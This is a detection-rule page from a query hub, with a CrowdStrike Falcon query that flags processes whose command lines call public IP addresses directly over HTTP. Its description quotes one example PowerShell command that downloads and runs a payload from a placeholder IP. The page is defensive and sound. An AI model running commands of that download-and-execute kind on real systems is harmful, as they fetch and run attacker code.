Volver al hub

Detection of External Direct IP Usage in CommandLine Windows and Mac

Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms.

EDRhuntingdetectionT1105T1059T1071.001
FDR intermediatepor sathishds (cql-hub.com) 1 min read

Query

in(#event_simpleName, values=["ProcessRollup2","SyntheticProcessRollup2"])
| CommandLine=*http* event_platform!="Lin"
// Basline to exclude legitimate process 
//| !in(field="ParentBaseFileName", values=//["UmbrellaDiagnostic.exe","HPClickExe","Eagle" ,"HPClick.exe"])
//| !in(field="FileName", values=["Google Chrome","chrome.exe"]) 
//| !in(field="CommandLine", values=["Google Chrome.app"])
| regex("(?<Urlink>\\bhttps?://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}.*\\/\\b)", field=CommandLine)
| regex("(?<Ipaddress>\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})", field=Urlink)
| !cidr(Ipaddress, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "168.63.0.0/16", "0.0.0.0/8"])
// Basline to exclude legitimate url | !in(field="Urlink", values=[
// Basline to exclude legitimate url  "http://100.1.1.1"
// Basline to exclude legitimate url ])
| default(field=GrandParentBaseFileName, value="Unknown")
| rootURL := "https://falcon.crowdstrike.com/"
| ProcessStartTime := round(ProcessStartTime)
| processStart:=formattime(field=ProcessStartTime, format="%m/%d %H:%M:%S")
// If Context Process ID is available utilize it, if not utilize Target Process ID
| case{ ContextProcessId ="*"
| ContextId:=ContextProcessId; TargetProcessId="*"
| ContextId:=TargetProcessId}
// Create URLs for Process and Graph Explorers
| format("[ProcessExplorer]%sinvestigate/process-explorer/%s/%s?_cid=%s", field=["rootURL", "aid", "ContextId", "cid"], as="ProcessExplorer")
| format("[GraphExplorer]%sgraphs/process-explorer/graph?id=pid:%s:%s", field=["rootURL", "aid", "TargetProcessId"], as="GraphExplorer")
// Format Execution Details for easy analysis
| format(format="%s\n\t↳ %s[ppid=%s]\n\t\t↳ %s [pid=%s|raw_pid=%s|start=%s]\n\t\t\t%,.100s[...TRIMMED]\n\t\t\t%s\n\t\t\t%s\n---", field=[GrandParentBaseFileName, ParentBaseFileName, ParentProcessId, ImageFileName, TargetProcessId, RawProcessId, processStart, CommandLine, ProcessExplorer, GraphExplorer], as="ExecutionSummary")
// Group by Source Host
| groupBy([ComputerName],function=([count(aid, as=executeCount), min(@timestamp, as=firstSeen), max(@timestamp, as=lastSeen), collect([UserName,ExecutionSummary,Ipaddress,ParentBaseFileName,ParentProcessId,ImageFileName,TargetProcessId], limit=1000)]))
| firstSeen:=formattime(field=firstSeen, format="%Y/%m/%d %H:%M:%S")
| lastSeen:=formattime(field=lastSeen, format="%Y/%m/%d %H:%M:%S")

Explicación

Importado desde cql-hub.com. Agrega explicación de pipes aquí.

Variables a ajustar

Revisa y ajusta los valores según tu entorno.